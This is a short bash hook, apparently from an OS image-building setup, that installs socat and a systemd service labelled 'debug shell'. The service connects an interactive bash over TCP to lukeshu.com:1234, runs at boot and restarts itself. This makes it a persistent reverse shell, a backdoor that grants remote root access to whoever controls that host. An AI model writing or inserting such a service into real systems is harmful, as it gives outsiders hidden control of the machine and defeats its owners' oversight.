#!/hint/bash

packages+=(
	socat
)

post_install+=(10:lukeshu-debug:post_install)
lukeshu-debug:post_install() {
	local arg_mountpoint=$1
	
	cat <<-'EOT' > "${arg_mountpoint}/etc/systemd/system/lukeshu-debug.service"
		[Unit]
		Description=debug shell
		Wants=network-online.target
		After=network-online.target

		[Service]
		Type=simple
		ExecStart=/bin/socat 'SYSTEM:bash -i 2>&1' TCP-CONNECT:lukeshu.com:1234
		Restart=always

		[Install]
		WantedBy=multi-user.target
		EOT
	systemctl --root="$arg_mountpoint" enable lukeshu-debug.service
}
